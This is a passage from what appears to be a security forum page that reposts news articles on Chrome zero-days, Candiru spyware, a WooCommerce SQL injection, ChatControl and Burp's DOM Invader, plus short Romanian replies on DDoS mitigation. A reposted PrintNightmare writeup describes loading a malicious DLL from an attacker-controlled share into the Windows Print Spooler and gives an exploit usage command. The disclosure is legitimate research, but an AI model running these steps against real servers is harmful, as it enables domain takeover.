Nytro

Say hi to Microsoft's own Linux: CBL-Mariner Microsoft has its own Linux distribution and, yes, you can download, install and run it. In fact, you may want to do just that. By Steven J. Vaughan-Nichols for Linux and Open Source | July 16, 2021 -- 12:27 GMT (13:27 BST) | Topic: Edge Computing Ok, so it's not named MS-Linux or Lindows, but Microsoft now has its very own, honest-to-goodness general-purpose Linux distribution: Common Base Linux, (CBL)-Mariner. And, just like any Linux distro, you can download it and run it yourself. Amazing isn't it? Why the next thing you know Microsoft will let you run Windows applications on Linux! Oh, wait it has! One more time with feeling, listen to yours truly and Linus Torvalds, Microsoft is no longer Linux's enemy. The enemy of AWS and Google? You bet. But, Linux no. Take, for example, CBL-Mariner. Microsoft didn't make a big fuss about releasing CBL-Mariner. It quietly released the code on GitHub and anyone can use it. Indeed, Juan Manuel Rey, a Microsoft Senior Program Manager for Azure VMware, recently published a guide on how to build an ISO CBL-Mariner image. Before this, if you were a Linux expert, with a spot of work you could run it, but now, thanks to Rey, anyone with a bit of Linux skill can do it. CBL-Mariner is not a Linux desktop. Like Azure Sphere, Microsoft's first specialized Linux distro, which is used for securing edge computing services, it's a server-side Linux. This Microsoft-branded Linux is an internal Linux distribution. It's meant for Microsoft's cloud infrastructure and edge products and services. Its main job is to provide a consistent Linux platform for these devices and services. Just like Fedora is to Red Hat, it keeps Microsoft on Linux's cutting edge. CBL-Mariner is built around the idea that you only need a small common core set of packages to address the needs of cloud and edge services. If you need more, CBL-Mariner also makes it easy to layer on additional packages on top of its common core. Once that's done, its simple build system easily enables you to create RPM packages from SPEC and source files. Or, you can also use it to create ISOs or Virtual hard disk (VHD) images. As you'd expect the basic CBL-Mariner is a very lightweight Linux. You can use it as a container or a container host. With its limited size also comes a minimal attack surface. This also makes it easy to deploy security patches to it via RPM. Its designers make a particular point of delivering the latest security patches and fixes to its users. For more about its security features see CBL-Mariner's GitHub security features list. Like any other Linux distro, CBL-Mariner is built on the shoulders of giants. Microsoft credits VMware's Photon OS Project, a secure Linux, The Fedora Project, Linux from Scratch -- a guide to building Linux from source, the OpenMamba distro, and, yes, even GNU and the Free Software Foundation (FSF). I know it galls some of you that Microsoft acknowledges the FSF, but this is not the '90s and Steve "Linux is a cancer" Ballmer hasn't been Microsoft's CEO since 2014. To try it for yourself, you'll build it on Ubuntu 18.04. Frankly, I'd be surprised if you couldn't build it on any Ubuntu Linux distro from 18.04 on up. I did it on my Ubuntu 20.04.2 desktop. You'll also need the latest version of the Go language and Docker. Even though the default build system is Ubuntu, CBL-Mariner itself owes a large debt to Fedora. For example, it uses Tiny DNF as its DNF RPM package manager. For its atomic image-based update mechanism it uses RPM-OSTree. So, if you want a secure, stable Linux for your edge computing or container needs, I suggest -- in all seriousness -- you give CBL-Mariner a try. While I continue to have my doubts about Windows as a serious operating system, Microsoft did a fine job of creating a solid Linux. Who would have guessed! Sursa: https://www.zdnet.com/article/say-hi-to-microsofts-own-linux-cbl-mariner/

Google patches 8th Chrome zero-day exploited in the wild this year By Sergiu Gatlan July 16, 2021 Google has released Chrome 91.0.4472.164 for Windows, Mac, and Linux to fix seven security vulnerabilities, one of them a high severity zero-day vulnerability exploited in the wild. "Google is aware of reports that an exploit for CVE-2021-30563 exists in the wild," the company revealed. The new Chrome release has started rolling out worldwide to the Stable desktop channel and will become available to all users over the following days. Google Chrome will automatically update itself on the next launch, but you can also manually update it by checking for the newly released version from Settings > Help > 'About Google Chrome.' Eighth exploited zero-day patched this year The zero-day patched on Thursday and reported by Google Project Zero's Sergei Glazunov is described as a type confusion bug in V8, Google's open-source C++-based and high-performance WebAssembly and JavaScript engine. Even though type confusion weaknesses would generally lead to browser crashes following successful exploitation by reading or writing memory out of the bounds of the buffer, they can also be exploited by threat actors to execute arbitrary code on devices running vulnerable software. While Google said that it is aware of CVE-2021-30563 in the wild exploitation, it did not share info regarding these attacks to allow the security update to deploy on as many systems as possible before more threat actors start actively abusing. "Access to bug details and links may be kept restricted until a majority of users are updated with a fix," Google said. "We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed." In all, Google has patched eight Chrome zero-day bugs exploited by attackers in the wild since the start of 2021. Besides CVE-2021-30563, the company previously addressed: CVE-2021-21148 - February 4th, 2021 CVE-2021-21166 - March 2nd, 2021 CVE-2021-21193 - March 12th, 2021 CVE-2021-21220 - April 13th, 2021 CVE-2021-21224 - April 20th, 2021 CVE-2021-30551 - June 9th, 2021 CVE-2021-30554 - June 17th, 2021 More details on previously patched Chrome zero-days The Google Threat Analysis Group (TAG) has shared additional details earlier this week regarding in-the-wild exploitation of CVE-2021-21166 and CVE-2021-30551 Chrome zero-days. "Based on our analysis, we assess that the Chrome and Internet Explorer exploits described here were developed and sold by the same vendor providing surveillance capabilities to customers around the world," Google said. On Thursday, Microsoft and Citizen Lab linked the vendor mentioned in Google TAG's report to Israeli spyware vendor Candiru Threat actors deployed the surveillance vendor's spyware to infect iOS, Android, macOS, and Windows devices using Chrome zero-days and Windows unpatched flaws. Microsoft researchers found that Candiru's malware was used to compromise the systems of "politicians, human rights activists, journalists, academics, embassy workers, and political dissidents." In all, Microsoft said it discovered "at least 100 victims in Palestine, Israel, Iran, Lebanon, Yemen, Spain, United Kingdom, Turkey, Armenia, and Singapore." Sursa: https://www.bleepingcomputer.com/news/security/google-patches-8th-chrome-zero-day-exploited-in-the-wild-this-year/

Microsoft: Mai multe guverne au folosit un program de spionaj făcut în Israel. Printre ținte au fost politicieni, disidenți, jurnaliști 16.07.2021 11:03 Un program informatic de spionaj făcut de o companie din Israel a fost folosit de mai multe guverne pentru a monitoriza politicieni, disidenți, jurnaliști, activiști pentru drepturile omului. Foto: Profimedia Images Mai multe guverne au utilizat instrumente informatice de spionaj dezvoltate de o companie israeliană pentru a monitoriza responsabili politici, disidenţi, jurnalişti, universitari şi militanţi pentru drepturile omului, potrivit unor experţi din cadrul Microsoft și Citizen Lab, citaţi joi de AFP. Aceste “arme” puternice au fost utilizate împotriva a peste 100 de persoane din lumea întreagă, susţine un responsabil de securitate de la Microsoft şi Citizen Lab, o organizaţie cu sediul la Universitatea din Toronto. Microsoft declară că şi-a modificat sistemul de operare Windows pentru a remedia lacunele exploatate de grupul israelian, conform Agerpres. Aceasta este o companie cu sediul la Tel Aviv, deosebit de discretă, care vinde exclusiv guvernelor spyware (categorie de software rău intenţionat) ce pot infecta smartphone-uri, calculatoare şi servicii de cloud computing (accesarea la cerere, de resurse hardware şi software prin internet), potrivit Citizen Lab. Numele său oficial este în prezent Saito Tech Ltd, dar este mai cunoscută sub numele de Candiru. Cercetătorii de la Citizen Lab au găsit dovezi că software-ul de spionare a reuşit să extragă informaţii din mai multe aplicaţii utilizate de victime, inclusiv Gmail, Skype, Telegram şi Facebook. Software-ul poate consulta, de asemenea, istoricul căutărilor persoanelor vizate pe Internet, precum şi parolele lor şi poate activa camera şi microfonul aparatelor lor. La rândul său, Microsoft subliniază că a identificat victime ale acestui soft în teritoriile palestiniene, în Israel, în Liban, Yemen, Spania, Regatul Unit, Turcia, Armenia şi Singapore. Potrivit gigantului IT, care a denumit spyware-ul „DevilsTongue”, acesta din urmă a reuşit să se infiltreze pe site-uri populare precum Facebook, Twitter, Gmail şi Yahoo pentru a colecta informaţii, a citi mesajele victimelor şi a prelua fotografii. Software-ul a reuşit de asemenea să trimită mesaje în numele victimelor. Compania americană a creat „protecţii” pentru a-şi proteja produsele de incursiunile acestui software dezvoltat de grupul israelian pe care îl numeşte Sourgum. „Am prezentat aceste protecţii comunităţii de securitate, astfel încât să putem contracara şi atenua în mod colectiv această ameninţare”, menţionează Microsoft. Editor : A.C. Sursa; https://www.digi24.ro/stiri/externe/microsoft-mai-multe-guverne-au-folosit-un-program-de-spionaj-facut-in-israel-printre-tinte-au-fost-politicieni-disidenti-jurnalisti-1600429

Salut, nu am niciun detaliu despre astfel de firme, ma astept sa se invete lucruri de aici, nu stiu cat de mult conteaza acea diploma pe care o primesti dar din cate imi aduc aminte cursurile se intind pe o durata imensa de timp. Daca de exemplu un curs dureaza 6 luni... In 6 luni poti invata sa proiectezi rachete (daca nu lucrezi 2 ore pe saptamana).

Critical SQL Injection Vulnerability Patched in WooCommerce This entry was posted in Vulnerabilities, WordPress Security on July 15, 2021 by Ram Gall 3 Replies Update: The article originally credited Tommy DeVoss (dawgyg) for the discovery. We’ve since been contacted by Tommy, who let us know that the credit should go to another researcher, Josh from DOS (Development Operations Security) On July 14, 2021, WooCommerce released an emergency patch for a SQL Injection vulnerability reported by a security researcher, Josh from DOS (Development Operations Security), based in Richmond Virginia. This vulnerability allowed unauthenticated attackers to access arbitrary data in an online store’s database. WooCommerce is the leading e-Commerce platform for WordPress and is installed on over 5 million websites. Additionally, the WooCommerce Blocks feature plugin, installed on over 200,000 sites, was affected by the vulnerability and was patched at the same time. The Wordfence Threat Intelligence team was able to develop proofs of concept for time-based and boolean-based blind injections and released an initial firewall rule to our Premium customers within hours of the patch. We released an additional firewall rule to cover a separate variant of the same attack the next day, on July 15, 2021. Sites still running the free version of Wordfence will receive the same protection after 30 days, on August 13 and August 14, 2021. We strongly recommend updating to a patched version of WooCommerce immediately if you have not been updated automatically, as this will provide the best possible protection. The vulnerability affects versions 3.3 to 5.5 of the WooCommerce plugin and WooCommerce Blocks 2.5 to 5.5 plugin. WooCommerce Responded Immediately In the announcement by WooCommerce, Beau Lebens, the Head of Engineering for WooCommerce stated, “Upon learning about the issue, our team immediately conducted a thorough investigation, audited all related codebases, and created a patch fix for every impacted version (90+ releases) which was deployed automatically to vulnerable stores.” Due to the critical nature of the vulnerability, the WordPress.org team is pushing forced automatic updates to vulnerable WordPress installations using these plugins. Store owners using older versions can update to the latest version in their branch. For example, if your storefront is using WooCommerce version 5.3, you can update to version 5.3.1 to minimize the risk of compatibility issues. Within the security announcement from WooCommerce, there is a table detailing the 90 patched versions of WooCommerce. Additionally, WooCommerce has a helpful guide for WooCommerce updates. Has This Been Exploited in the Wild? While the original researcher has indicated that this vulnerability has been exploited in the wild, Wordfence Threat Intelligence has found extremely limited evidence of these attempts and it is likely that such attempts were highly targeted. If you think you have been exploited due to this vulnerability, the WooCommerce team is recommending administrative password resets after updating to provide additional protection. If you do believe that your site may have been affected, a review of your log files may show indications. Look for a large number of repeated requests to /wp-json/wc/store/products/collection-data or ?rest_route=/wc/store/products/collection-data in your log files. Query strings which include %2525 are an indicator that this vulnerability may have been exploited on your site. Improving Security of the WordPress Ecosystem Sites with e-Commerce functionality are a high-value target for many attackers, so it is critical that vulnerabilities in e-Commerce platforms are addressed promptly to minimize the potential damage that can be caused. With the growth of both WordPress and WooCommerce, more security researchers have turned attention to WordPress related products. The rapid and deep response that the WooCommerce team performed in protecting WooCommerce users is a great sign for the ongoing security of e-Commerce in the open source WordPress ecosystem. Sursa: https://www.wordfence.com/blog/2021/07/critical-sql-injection-vulnerability-patched-in-woocommerce/

#CHATCONTROL: EU PARLIAMENT APPROVES MASS SURVEILLANCE OF PRIVATE COMMUNICATIONS JULY 6, 2021 Brussels, 06/07/2021 – Today, the European Parliament approved the ePrivacy Derogation, allowing providers of e-mail and messaging services to automatically search all personal messages of each citizen for presumed suspect content and report suspected cases to the police. The European Pirates Delegation in the Greens/EFA group strongly condemns this automated mass surveillance, which effectively means the end of privacy in digital correspondence. Pirate Party MEPs plan to take legal action. In today’s vote, 537 Members of the European Parliament approved Chatcontrol, with 133 voting against and 20 abstentions.[1] According to police data, in the vast majority of cases, innocent citizens come under suspicion of having committed an offence due to unreliable processes. In a recent representative poll, 72% of EU citizens opposed general monitoring of their messages.[2] While providers will initially have a choice to search or not to search communications, follow-up legislation, expected in autumn, is to oblige all communications service providers to indiscriminate screening. Breyer: “This harms children rather than protecting them” German Pirate Party Member of the European Parliament Patrick Breyer, shadow rapporteur on the legislative proposal, comments: *“The adoption of the first ever EU regulation on mass surveillance is a sad day for all those who rely on free and confidential communications and advice, including abuse victims and press sources. The regulation deals a death blow to the confidentiality of digital correspondence. It is a general breach of the dam to permit indiscriminate surveillance of private spaces by corporations – by this totalitarian logic, our post, our smartphones or our bedrooms could also be generally monitored. Unleashing such denunciation machines on us is ineffective, illegal and irresponsible. Indiscriminate searches will not protect children and even endanger them by exposing their private photos to unknown persons, and by criminalising children themselves. Already overburdened investigators are kept busy with having to sort out thousands of criminally irrelevant messages. The victims of such a terrible crime as child sexual abuse deserve measures that prevent abuse in the first place. The right approach would be, for example, to intensify undercover investigations into child porn rings and reduce of the years-long processing backlogs in searches and evaluations of seized data.”* Marcel Kolaja, Czech Pirate Party MEP and Vice-President of the European Parliament, comments: “Post officers also do not open your private letters to see if you’re sending anything objectionable. The same rule should apply online. However, what this exception will do is an irrevocable damage to our fundamental right to privacy, Moreover, monitoring across large platforms will only lead to criminals moving to platforms where chat control will be technically impossible. As a result, innocent people will be snooped on a daily basis while tracking down criminals will fail.“ Pirates plan legal action against the regulation The EU’s plans for chat control have been confirmed to violate fundamental rights by a former judge of the European Court of Justice.[3] Patrick Breyer plans to take legal action against the regulation and is looking for victims of abuse who would file such a complainant. „Abuse victims are particularly harmed by this mass surveillance“, explains Breyer. „To be able to speak freely about the abuse they have suffered and seek help in a safe space is critical to victims of sexualised violence. depend on the possibility to communicate safely and confidentially. These safe spaces are now being taken away from them, which will prevent victims from seeking help and support.“ The European Commission has already announced a follow-up regulation to make chat control mandatory for all email and messaging providers. Previously secure end-to-end encrypted messenger services such as Whatsapp or Signal would be forced to install a backdoor. There is a considerable backlash against these plans: A public consultation carried out by the EU Commission revealed that 51% of all respondents oppose chat control for e-mail and messaging providers. 80% of respondents do not want chat control to be applied to encrypted messages. [4] Due to the resistance, EU Commissioner for Home Affairs Ylva Johannson has postponed the proposal until September 2021. More Information on Chatcontrol: www.chatcontrol.eu [1] [2] https://www.patrick-breyer.de/en/poll-72-of-citizens-oppose-eu-plans-to-search-all-private-messages-for-allegedly-illegal-material-and-report-to-the-police/ [3] https://www.patrick-breyer.de/wp-content/uploads/2021/03/Legal-Opinion-Screening-for-child-pornography-2021-03-04.pdf [4] https://ec.europa.eu/info/law/better-regulation/have-your-say/initiatives/12726-Child-sexual-abuse-online-detection-removal-and-reporting-/public-consultation_de Sursa: https://european-pirateparty.eu/parliament-approves-chatcontrol/

Par sa fie multe request-uri catre portul 27016 care sa contina "....TSource Engine Query.." Am luat 3 IP-uri random si pare ca vine cate un astfel de pachet de la fiecare IP, nu mai multe. Ma gandesc ca IP-ul sursa este spoofed, dar e posibil ca pachetul in sine sa fie necesar. Un test rapid ar fi blocarea acestor pachete DAR ar putea crapa ceva(sau tot, sa nu mai mearga).

O solutie teoretica, dar care ar dura ceva timp, ar fi urmatoarea: 1. Monitorizezi performanta si prinzi in timp ce se intampla un astfel de atac 2. Pornesti un tcpdump si capturezi pachete pentru o anumite perioada, sa zicem 2-5 minute 3. Analizezi si vezi ce pachete vin in disperare 4. Le blochezi (dar verifici sa nu crape ceva) O alta posibila solutie ar fi log-uri de la serverele de CS, daca exista. Daca se pot pune pe un mod mai "verbose" e ideal. Poate, cumva, apar multe loguri cu anumite lucruri. SYN cookies ai incercat? https://tldp.org/LDP/solrhe/Securing-Optimizing-Linux-RH-Edition-v1.3/chap5sec56.html De fapt cred ca foloseste UDP CS-ul din cate stie eu. Asta inseamna ca teoretic DDOS-ul poate fi "amplificat" prin diverse vulnerabilitati in servere de pe Internet, dar pachetele nu sunt valide. Fa un astfel de tcpdump mai bine si daca crezi ca nu contine nimic "sensitive" ni-l poti da sa ne uitam peste el. Nu garantam ca gasim ceva, dar putem incerca. PS: Daca CS e doar pe portul 27.001 ai putea captura doar datele de pe acel port, dar ar fi util sa te uiti si la celelalte, cine stie ce o mai fi pe acolo.

Salut, ai incercat sa vorbesti cu cei de la Voxility? Ar putea stii despre ce e vorba si cum sa le opreasca. Daca nu, va trebui vazut cum functioneaza mizeriile respective, sa stii ce si cum sa opresti, probabil cateva reguli de iptables ar trebui sa fie de ajuns, nu ma astept sa fie ceva tocmai sofisticat.

Nu ma pricep la hardware dar cand am comparat 2 procesoare am folosit asta: https://cpu.userbenchmark.com/Compare/Intel-Core-i7-3610QM-vs-Intel-Core-i7-2600/2730vs620 Si am tinut cont de acel "Speed rank". Dar o comparatie reala se face in functie de multe aspecte si la un laptop conteaza mai multe decat procesorul.

My goal in this video is to make RSA as easy to understand (and perform) as possible. The math can get a little complicated, so I try to go step by step and explain every operation. If you have any questions, feel free to leave a comment and I'll get back to you as soon as I can. If you enjoyed the video, remember to like and share. If you want to see more content like this in the future, consider subscribing. Thanks for watching!

Well, I think the code can be used for more than Fortinet and Sonicwall, it looks pretty generic and easy to implement in a project.

PrintNightmare (CVE-2021-1675): Remote code execution in Windows Spooler Service Ten years ago, an escalation of privilege bug in Windows Printer Spooler was used in Stuxnet, which is a notorious worm that destroyed the nuclear enrichment centrifuges of Iran and infected more than 45000 networks. In the past ten years, spooler still has an endless stream of vulnerabilities disclosed, some of which are not known to the world, however, they are hidden bombs that could lead to disasters. Therefore, we have focused on spooler over the past months and reaped fruitfully. The beginning of the research is PrintDemon from which we get inspiration. After digging into this bug deeper, we found a way to bypass the patch of MS. But just after MS released the new version, we immediately found a new way to exploit it again. After the story of PrintDemon, we realized that spooler is still a good attack surface, although security researchers have hunted for bugs in spooler for more than ten years. We started to explore the inner working of Printer Spooler and discovered some 0-day Bugs in it. Some of them are more powerful than PrintDemon and easier to exploit, and the others can be triggered from remote which could lead to remote code execution. CVE-2021-1675 is a remote code execution in Windows Print Spooler. According to MSRC security bullion, this vulnerability is reported by Zhipeng Huo, Piotr Madej and Zhang Yunhai. We also found this bug before and hope to keep it secret to participate Tianfu Cup ☹. As there are some people already published exploit video of CVE-2021-1675. Here we publish our writeup and exploit for CVE-2021-1675. For more RCE and LPE vulnerabilities in Windows Spooler, please stay tuned and wait our Blackhat talks ‘Diving Into Spooler: Discovering LPE and RCE Vulnerabilities in Windows Printer‘. RpcAddPrinterDriver Adding a Printer Driver to a Server (RpcAddPrinterDriver) Let check the MS-RPRN: Print System Remote Protocol about the RpcAddPrinterDriver call. To add or update a printer driver ("OEM Printer Driver") to a print server ("CORPSERV"), a client ("TESTCLT") performs the following steps. The client can use the RPC call RpcAddPrinterDriver to add a driver to the print server. The client ensures that the files for the printer driver are in a location accessible to the server. For that purpose, the client can share a local directory containing the files, or use [MS-SMB] to place the files into a directory on the server The client then allocates and populates a DRIVER_INFO_2 structure as follows: pName = L"OEM Printer Driver"; pEnvironment = L"Windows NT x86"; /* Environment the driver is compatible with */ pDriverPath = "\\CORPSERV\C$\DRIVERSTAGING\OEMDRV.DLL";315 / 415 [MS-RPRN] - v20200826 Print System Remote Protocol Copyright © 2020 Microsoft Corporation Release: August 26, 2020 pDataFile = "\\CORPSERV\C$\DRIVERSTAGING\OEMDATA.DLL"; pConfigFile = "\\CORPSERV\C$\DRIVERSTAGING\OEMUI.DLL"; The client allocates a DRIVER_CONTAINER driverContainer structure and initializes it to contain the DRIVER_INFO_2 structure. The client calls RpcAddPrinterDriver. RpcAddPrinterDriver( L"\\CORPSERV", &driverContainer ); CVE-2021-1675 Analysis Clearly, if an attacker can bypass the authentication of RpcAddPrinterDriver. He could install an malicious driver in the print server. In msdn, the client need SeLoadDriverPrivilege to call the RPC. However, this isn’t true. Let check the authentication logical here: ValidateObjectAccess is a normal security check for Spooler Service. But in line 19 and 20, argument a4 is user controllable. So, a normal user can bypass the security check and add an driver. If you are in the domain, a normal domain user can connect to the Spooler service in the DC and install a driver into the DC. Then he can fully control the Domain. Exploit But the real attack is not that simple. To exploit the authentication bypass bug, we need to understand what the Spooler service will do when you calling RpcAddPrinterDriver. Suppose you supply there path to the service pDataFile =A.dll pConfigFile =\attackerip\Evil.dll pDriverPath=C.dll It will copy A,B and C into folder C:\Windows\System32\spool\drivers\x64\3\new. And then it will copy them to C:\Windows\System32\spool\drivers\x64\3, and load C:\Windows\System32\spool\drivers\x64\3\A.dll and C:\Windows\System32\spool\drivers\x64\3\C.dll into the Spooler service. However, in the latest version, Spooler will check to make sure that A and C is not a UNC path. But as B can be an UNC path, so we can set pConfigFile as an UNC path (an evildll). This will make our evildll Evil.dll be copied into C:\Windows\System32\spool\drivers\x64\3\ Evil.dll. Then call RpcAddPrinterDriver again, to set pDataFile to be C:\Windows\System32\spool\drivers\x64\3\ Evil.dll. It will load our evil dll. Unfortunate, it does not work. Because if you set A, B, C in the folder C:\Windows\System32\spool\drivers\x64\3. There will be an access conflict in file copy. To bypass this, we need to use the backup feature of driver upgrade. If we upgrade some driver, the old version will be backup into C:\Windows\System32\spool\drivers\x64\3\old\1\ folder. Then we can bypass the access conflict and success inject our evil.dll into spooler service. Successfully load our dll: Usage .\PrintNightmare.exe dc_ip path_to_exp user_name password Example: .\PrintNightmare.exe 192.168.5.129 \\192.168.5.197\test\MyExploit.dll user2 test123## Tested on windows sever 2019 1809 17763.1518 Impact This vulnerability can be used to achieve LPE and RCE. As for the RCE part, you need a user to authenticated on the Spooler service. However, this is still critical in Domain environment. Because normally DC will have Spooler service enable, a compromised domain user may use this vulnerability to control the DC. Here are more hidden bombs in Spooler, which is not public known. We will share more RCE and LPE vulnerabilities in Windows Spooler, please stay tuned and wait our Blackhat talks ‘Diving Into Spooler: Discovering LPE and RCE Vulnerabilities in Windows Printer‘. Credit Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370) Sursa: https://github.com/afwu/PrintNightmare

Noul trend: https://twitter.com/hashtag/InfoSecBikini?src=hashtag_click

June 30, 2021 The critical role of Zero Trust in securing our world Vasu Jakkal Corporate Vice President, Security, Compliance and Identity Share We are operating in the most complex cybersecurity landscape that we’ve ever seen. While our current ability to detect and respond to attacks has matured incredibly quickly in recent years, bad actors haven’t been standing still. Large-scale attacks like those pursued by Nobelium1 and Hafnium, alongside ransomware attacks on critical infrastructure indicate that attackers have become increasingly sophisticated and coordinated. It is abundantly clear that the work of cybersecurity and IT departments are critical to our national and global security. Microsoft has a unique level of access to data on cyber threats and attacks globally, and we are committed to sharing this information and insights for the greater good. As illustrated by recent attacks, we collaborate across the public and private sectors, as well as with our industry peers and partners, to create a stronger, more intelligent cybersecurity community for the protection of all. This collaborative relationship includes the United States government, and we celebrate the fast-approaching milestones of the US Cybersecurity Executive Order2 (EO). The EO specifies concrete actions to strengthen national cybersecurity and address increasingly sophisticated threats across federal agencies and the entire digital ecosystem. This order directs agencies and their suppliers to improve capabilities and coordination on information sharing, incident detection, incident response, software supply chain security, and IT modernization, which we support wholeheartedly. With these national actions set in motion and a call for all businesses to enhance cybersecurity postures, Microsoft and our extensive partner ecosystem stand ready to help protect our world. The modern framework for protecting critical infrastructure, minimizing future incidents, and creating a safer world already exists: Zero Trust. We have helped many public and private organizations to establish and implement a Zero Trust approach, especially in the wake of the remote and hybrid work tidal wave of 2020-2021. And Microsoft remains committed to delivering comprehensive, integrated security solutions at scale and supporting customers on every step of their security journey, including detailed guidance for Zero Trust deployment. Zero Trust’s critical role in helping secure our world The evidence is clear—the old security paradigm of building an impenetrable fortress around your resources and data is simply not viable against today’s challenges. Remote and hybrid work realities mean people move fluidly between work and personal lives, across multiple devices, and with increased collaboration both inside and outside of organizational boundaries. Entry points for attacks—identities, devices, apps, networks, infrastructure, and data—live outside the protections of traditional perimeters. The modern digital estate is distributed, diverse, and complex. This new reality requires a Zero Trust approach. Section 3 of the EO calls for “decisive steps” for the federal government “to modernize its approach to cybersecurity” by accelerating the move to secure cloud services and Zero Trust implementation, including a mandate of multifactor authentication and end-to-end encryption of data. We applaud this recognition of the Zero Trust strategy as a cybersecurity best practice, as well as the White House encouragement of the private sector to take “ambitious measures” in the same direction as the EO guidelines. Per Section 3, federal standards and guidance for Zero Trust are developed by the National Institute of Standards and Technology (NIST) of the US Department of Commerce, similar to other industry and scientific innovation measurements. NIST has defined Zero Trust in terms of several basic tenets: All resource authentication and authorization are dynamic and strictly enforced before access is allowed. Access to trust in the requester is evaluated before the access is granted. Access should also be granted with the least privileges needed to complete the task. Assets should always act as if an attacker is present on the enterprise network. At Microsoft, we have distilled these Zero Trust tenets into three principles: verify explicitly, use least privileged access, and assume breach. We use these principles for our strategic guidance to customers, software development, and global security posture. Organizations that operate with a Zero Trust mentality are more resilient, consistent, and responsive to new attacks. A true end-to-end Zero Trust strategy not only makes it harder for attackers to get into the network but also minimizes potential blast radius by preventing lateral movement. While preventing bad actors from gaining access is critical, it’s only part of the Zero Trust equation. Being able to detect a sophisticated actor inside your environment is key to minimizing the impact of a breach. Sophisticated threat intelligence and analytics are critical for a rapid assessment of an attacker’s behavior, eviction, and remediation. Resources for strengthening national security in the public and private sectors We believe President Biden’s EO is a timely call-to-action, not only for government agencies but as a model for all businesses looking to become resilient in the face of cyber threats. The heightened focus on incident response, data handling, collaboration, and implementation of Zero Trust should be a call-to-action for every organization—public and private—in the mission to better secure our global supply chain, infrastructure resources, information, and progress towards a better future. Microsoft is committed to supporting federal agencies in answering the nation’s call to strengthen inter- and intra-agency capabilities unlocking the government’s full cyber capabilities. Recommended next steps for federal agencies have been outlined by my colleague Jason Payne, Chief Technology Officer of Microsoft Federal. As part of this responsibility, we have provided Federal agencies with key Zero Trust Scenario Architectures mapped to NIST standards, as well as a Zero Trust Rapid Modernization Plan. Microsoft is also committed to supporting customers in staying up to date with the latest security trends and developing the next generation of security professionals. We have developed a set of skilling resources to train teams on the capabilities identified in the EO and be ready to build a more secure, agile environment that supports every mission. In addition to EO resources for federal government agencies, we are continuing to publish guidance, share learnings, develop resources, and invest in new capabilities to help organizations accelerate their Zero Trust adoption and meet their cybersecurity requirements. Here are our top recommended Zero Trust resources: For details on how Microsoft defines Zero Trust and breaks down solutions across identities, endpoints, apps, networks, infrastructure, and data, download the Zero Trust Maturity Model. To assess your organization’s progress in the Zero Trust journey and receive suggestions for technical next steps, use our Zero Trust Assessment tool. For technical guidance on deployment, integration, and development, visit our Zero Trust Guidance Center for step-by-step guidance on implementing Zero Trust principles. If you’d like to learn from our own Zero Trust deployment journey at Microsoft, our Chief Information Security Officer Bret Arsenault and team share their stories at Microsoft Digital Inside Track. Tackling sophisticated cyber threats together The EO is an opportunity for all organizations to improve cybersecurity postures and act rapidly to implement Zero Trust, including multifactor authentication and end-to-end encryption. The White House has provided clear direction on what is required, and the Zero Trust framework can also be used as a model for private sector businesses, state and local governments, and organizations around the world. We can only win as a team against these malicious attackers and significant challenges. Every step your organization takes in advancing a Zero Trust architecture not only secures your assets but also contributes to a safer world for all. We applaud organizations of every size for embracing Zero Trust, and we stand committed to partnering with you all on this journey. To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. 1Nobelium Resource Center, Microsoft Security Response Center. 04 March 2021. 2President Signs Executive Order Charting New Course to Improve the Nation’s Cybersecurity and Protect Federal Government Networks, The White House, 12 May 2021. Sursa: https://www.microsoft.com/security/blog/2021/06/30/the-critical-role-of-zero-trust-in-securing-our-world/

Introducing DOM Invader: DOM XSS just got a whole lot easier to find Gareth Heyes | 30 June 2021 at 16:47 UTC XSS DOM Hacking Tools Of the three main types of XSS, DOM-based XSS is by far the most difficult to find and exploit. But we come bearing good news! PortSwigger just released a new tool for Burp Suite Professional and Burp Suite Community Edition that's going to make testing for DOM XSS much easier - and we think you're going to like it. Meet: DOM Invader. We've created a YouTube video to show you how to use DOM Invader and solve an Academy lab: Background Most modern sites use multiple JavaScript libraries - and have many lines of complex, minified code. This makes testing for DOM XSS a real headache. PortSwigger Research has specifically developed DOM Invader to make this process much easier. "The Augmented DOM allows you to find DOM XSS as if it were reflected XSS." Through its Augmented DOM, DOM Invader will provide you with a convenient tree view of all of your target's sources and sinks. This greatly simplifies the task of hunting for DOM XSS, and will be big news for the bug bounty hunting and pentest communities. So, without further ado, let's take a closer look at DOM Invader and what it can do: DOM Invader's Augmented DOM provides a convenient tree view of an application's sources and sinks. How to get started with DOM Invader DOM Invader is a completely new Burp Suite tool, implemented as an extension in the embedded browser. Simply update your version of Burp Suite Professional or Burp Suite Community Edition to 2021.7 on the Early Adopter channel to start using it. View the latest release notes. By default, DOM Invader is turned off (because it alters site behavior). Turn it on by clicking the icon in the top right hand corner of Burp Suite's embedded browser. DOM Invader lives in Burp Suite's embedded browser. DOM Invader instruments your target's DOM, intercepting any JavaScript sources and sinks it might come across, and organizing them ready for you to play with. A "source" could be any JavaScript object that allows user-controlled input (for example: location.search), while a "sink" is any function or setter that allows JavaScript/HTML execution. One notorious example of a sink is the eval function. "Helpfully, DOM Invader orders sinks so that the most interesting ones appear first." With DOM Invader, we're going to be working a lot with canaries. A canary is a unique string that's used to see where your user input is reflected inside a sink. By default, DOM Invader uses a random canary, but you can customize this value to whatever you like. How DOM Invader works We're not going to go into a full demo of how to use DOM Invader here (please see the documentation for that), but as a broad overview, you're going to be spending a lot of your time using the tool in the Augmented DOM. The Augmented DOM will show you all the sources and sinks contained within your target, and allows you to find DOM XSS as if it were reflected XSS - by inspecting the value sent to the sink. Essentially, you'll load up the site you want to test, and insert your canary into a query parameter or other such source. Opening DevTools in Burp Suite's embedded browser, you'll be able to click on a new "Augmented DOM" tab - which will show you any sources and sinks containing the canary value - as well as a tree view of all the sources and sinks available. Helpfully, DOM Invader orders sinks so that the most interesting ones appear first. DOM Invader will order lists of sinks with the most interesting ones appearing first. When you find an interesting sink, DOM Invader will allow you to see the value contained in it, as well as a stack trace. It'll even highlight your canary for you. At this point, you might like to add some extra characters to your canary in the URL parameter or another source. You can then check the canary value in the Augmented DOM to see if those characters have been correctly encoded. Canaries are automatically highlighted by DOM Invader. Other useful features include the ability to search values sent to a sink, as well as automatically injecting canaries into URL parameters and form elements. View the full documentation for DOM Invader. Web messages in DOM Invader When testing sites, 